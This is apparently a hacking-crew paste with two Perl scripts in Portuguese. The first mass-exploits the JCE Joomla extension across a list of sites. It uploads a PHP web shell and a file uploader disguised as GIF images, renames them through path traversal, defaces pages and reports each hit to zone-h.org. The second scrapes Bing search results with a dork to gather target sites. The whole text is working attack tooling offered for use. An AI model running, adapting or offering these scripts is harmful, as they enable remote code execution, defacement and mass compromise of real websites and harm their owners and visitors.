BOTS HIGHTECH BRAZIL HACKTEAM!

[1]

#!/usr/bin/perl -W

use Socket;
use IO::Socket;
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
$ag = LWP::UserAgent->new();
$ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
$ag->timeout(10);
#Recodado por No\One
#print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
#print "\t||||        Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)      ||||\n\n";

if($0 =~ /^(.*)\\(.+)$/){chomp($a = $2);}else{chomp($a = $0);}

if(!defined($ARGV[0])) { print "\n * Modo de usar => $a lista.txt ou $a -s www.site.com.br \n"; exit; }

$TXT = $ARGV[0]; if($TXT eq "-s"){@TXT = $ARGV[1]; $aq = $ARGV[1];
if(!defined($ARGV[1])) { print "\n\n * Modo de usar => $a lista.txt ou $a -s www.site.com\n\n"; exit; }
}else{open(TXT,"<$TXT"); chomp(@TXT=<TXT>); close(TXT); $aq = $ARGV[0];}
$tx = $#TXT+1;
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.2 .::.\n\n";

$ok = '0'; $erro = '0';
site: foreach(@TXT){ chomp(my $site = $_);
$cm=''; $porra = '0';
if($site =~ /http:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
}elsif($site =~ /http:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
}elsif($site =~ /https:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
}elsif($site =~ /https:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
}elsif($site =~ /http:\/\/(.*)\//){$site = $1;
}elsif($site =~ /http:\/\/(.*)/){$site = $1;
}elsif($site =~ /https:\/\/(.*)\//){$site = $1;
}elsif($site =~ /https:\/\/(.*)/){$site = $1;
}elsif($site =~ /(.*)\/(.*)\//){$site = $1; $cm = $2;
}elsif($site =~ /(.*)\/(.*)/){$site = $1; $cm = $2;
}elsif($site =~ /(.*)\//){$site = $1;}

$http = 'http://'; $porta = "80";

$script = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20';
$up = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b';

print "\n>> $site ->";
$cs++;
system "title $a $aq - [ $cs\/$tx ] =-= Zone-H [ OK ($ok) ~  ERRO ($erro) ]";
############################################### Packet 1 --> Checando falha
if($cm){ $script = '/'."$cm"."$script"; $up = '/'."$cm"."$up"; }

$pageURL= "$http"."$site"."$script";
$getp = $ag->request(HTTP::Request->new(GET => $pageURL));
$get = $getp->content;
if($get !~ m/multipart\/form-data|hastip|\/plugins\/editors\/jce\//g){ print " [!]"; next site;}

my @index = (
'../../xk.txt',
'../../xh.txt',
'../../ck.htm',
'../../tmp/x.html',
'../../cache/x.html',
'../x.html',
'../../tmp/ck.htm',
'../../cache/ck.htm',
'../ck.htm',
'../xxx.php',
'../xxu.php');

if($cm){push(@index,'../../../x.htm','../../../x.html','../../../x.php','../../../xk.txt','../../../xh.txt','../../../ck.htm');}

push(@index,'../../x.php','../../x.php');

foreach(@index){
chomp(my $indx = $_);
$porra++;

if($indx =~ /xk/){ $narq = 'arti'."$porra";
$cont  = 'Invasão feita por HighTech';}

if($indx =~ /xh/){ $narq = 'not'."$porra";
$cont  = 'Invasão feita por HighTech';}

if($indx =~ /configuration/){ $narq = 'clor'."$porra";
$cont  = 'Invasão feita por HighTech<?php exit;?>';}

if($indx =~ /index|ck/){ $narq = 'plas'."$porra";
$cont  = 'Invasão feita por HighTech';}

if($indx =~ /xxx/){ $narq = 'gligie'."$porra";
$cont  = 'GIF89a
<?php system("$_GET[cmd]"); exit; ?>';}

if($indx =~ /xxu/){ $narq = 'tir'."$porra";
$cont  = 'GIF89a u
<?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>';}


#print "\n\n $indx - $narq \n$cont \n\n----------------------------------------------";


############################################### Packet 2 --> Upando como um arquivo .gif
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
print $remote "POST $up HTTP/1.1"."\n";
print $remote "Host: $site"."\n";
print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
print $remote "Content-Type: multipart/form-data; boundary=---------------------------41184676334"."\n";
print $remote "Content-Length: 769"."\n\n";
print $remote "-----------------------------41184676334"."\n";
print $remote 'Content-Disposition: form-data; name="upload-dir"'."\n\n";
print $remote '/'."\n";
print $remote "-----------------------------41184676334"."\n";
print $remote 'Content-Disposition: form-data; name="Filedata"; filename=""'."\n";
print $remote 'Content-Type: application/octet-stream'."\n\n\n";
print $remote "-----------------------------41184676334"."\n";
print $remote 'Content-Disposition: form-data; name="upload-overwrite"'."\n\n";
print $remote "0"."\n";
print $remote "-----------------------------41184676334"."\n";
print $remote 'Content-Disposition: form-data; name="Filedata"; filename="'.$narq.'.gif"'."\n";
print $remote 'Content-Type: image/gif'."\n\n";
print $remote "$cont"."\n";
print $remote "-----------------------------41184676334"."\n";
print $remote 'Content-Disposition: form-data; name="upload-name"'."\n\n";
print $remote "$narq"."\n";
print $remote "-----------------------------41184676334"."\n";
print $remote 'Content-Disposition: form-data; name="action"'."\n\n";
print $remote 'upload'."\n";
print $remote "-----------------------------41184676334--"."\n\n";
close($remote);

############################################### Packet 3 --> Mudando nome de estenxão de .gif para .php
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
$json = 'json={"fn":"folderRename","args":["'.$narq.'.gif","'.$indx.'"]}';
print $remote "POST $script HTTP/1.1"."\n";
print $remote "Host: $site"."\n";
print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
print $remote 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'."\n";
print $remote 'X-Request: JSON'."\n";
print $remote "Content-Length: ".length($json).""."\n\n";
print $remote "$json"."\n\n";
#while(<$remote>){print "$_";}
close($remote);
}
############################################### Packet 4 --> Checando resultado do upload
my @xxx=('/images/xxu.php','/images/xxx.php');
if($cm){ push(@xxx,'/'."$cm".'/images/xxu.php','/'."$cm".'/images/xxx.php'); }
foreach(@xxx){
$shc = 'http://'."$site"."$_";
my $resc=$ag->request(HTTP::Request->new(GET => $shc));
$respc = $resc->content;
if($respc =~ m/GIF89a/g){ open(SHU,">>SH.txt"); print SHU "$shc\n"; close(SHU); } }

my @indxs = ('/','/ck.htm','/xk.txt','/xh.txt','/tmp/','/cache/','/images/','/tmp/ck.htm','/cache/ck.htm','/images/ck.htm');
if($cm){
push(@indxs,'/'."$cm".'/','/'."$cm".'/ck.htm','/'."$cm".'/xk.txt','/'."$cm".'/xh.txt','/'."$cm".'/tmp/','/'."$cm".'/cache/','/'."$cm".'/images/','/'."$cm".'/tmp/ck.htm','/'."$cm".'/cache/ck.htm','/'."$cm".'/images/ck.htm')}

foreach(@indxs){ chomp(my $iind = $_);

$urst = 'http://'."$site"."$iind";
my $res=$ag->request(HTTP::Request->new(GET => $urst));
$resp = $res->content;
if($resp =~ m/HighTech/g){ $sthckd = "$site"."$iind";
$sockz = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => "80", Proto => "tcp") or next;
print $sockz "POST /notify/single HTTP/1.0\r\n";
print $sockz "Accept: */*\r\n";
print $sockz "Referer: http://www.zone-h.org/notify/single\r\n";
print $sockz "Accept-Language: pt-br\r\n";
print $sockz "Content-Type: application/x-www-form-urlencoded\r\n";
print $sockz "Connection: Keep-Alive\r\n";
print $sockz "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801\r\n";
print $sockz "Host: www.zone-h.org\r\n";
$length=length("defacer=HighTech&domain1=http%3A%2F% 2F$sthckd&hackmode=17&reason=1");
print $sockz "Content-Length: $length\r\n";
print $sockz "Pragma: no-cache\r\n";
print $sockz "\r\n";
print $sockz "defacer=HighTech&domain1=http%3A%2F%2F$sthckd&hackmode=17&reason=1\r\n";
$zn = join('',<$sockz>);
if($zn =~ m/ERROR:/g){print " [ Zone-H ] ".$http.$sthckd." [ ERRO ]"; $erro++;}else{print " [ Zone-H ] ".$http.$sthckd." [ OK ]"; $ok++;}
close($sockz);
open(HCKDS,">>HCKDS.txt"); print HCKDS "$http"."$sthckd\n"; close(HCKDS);
$sthckd = ''; $hk++; next site;}
} }

if(!$hk){$hk=0;}if(!$ok){$ok=0;}if(!$erro){$erro=0;}
if($hk){
print "\n\n [ Total Hacked -> $hk -#- Enviado pro Zone-h -> $ok -#- Erro ao enviar pro zone -> $erro ]\n\n";}


------------------------------------------------------------------------------------------------------------

[2]

#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Request::Common qw(GET);
$ag = LWP::UserAgent->new();
$ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
$ag->timeout(10);

chomp(my $dork = $ARGV[0]);
system "title Pesquisando = $dork";
for ($i = 1; $i <= 10000; $i+=10){
$url = "http://www.bing.com/search?q=$dork&go=&qs=ds&filt=all&first=$i&FORM=PERE";
$resp = $ag->request(HTTP::Request->new(GET => $url));
$rrs = $resp->content;

while($rrs =~ m/<a href=\"?http:\/\/(.*?)\//g){
$link = $1;
if ( $link !~ /overture|msn|live|bing|yahoo|duckduckgo|google|yahoo|microsof/){
if ($link !~ /^http:/){$link = 'http://' . "$link" . '/';}
if($link !~ /\"|\?|\=|index\.php/){
print "\n\t $link";
push(@resul,$link);}} }

while($rrs =~ m/<a href=\"?http:\/\/(.*?[\/].*?)\//g){
$link = $1;
if ( $link !~ /overture|msn|live|bing|yahoo|duckduckgo|google|yahoo|microsof/){
if ($link !~ /^http:/){$link = 'http://' . "$link" . '/';}
if($link !~ /\"|\?|\=|index\.php/){
print "\n\t $link";
push(@resul,$link);}} }

if ($rrs !~ m/class=\"sb_pagN\"/g){
$total = $#resul+1;
open(TXTS,"<rRS.txt"); chomp(@ar = <TXTS>); close(TXTS); push(@resul,@ar);
open (TXT,">rRS.txt");
foreach(@resul){$c{$_}++;next if $c{$_} > 1;print TXT "$_\n";push(@arq,$_);}
close(TXT);
$arq=$#arq+1;
print "\n\n Total Resultado $total , total em arquivo $arq\n"; exit; }
}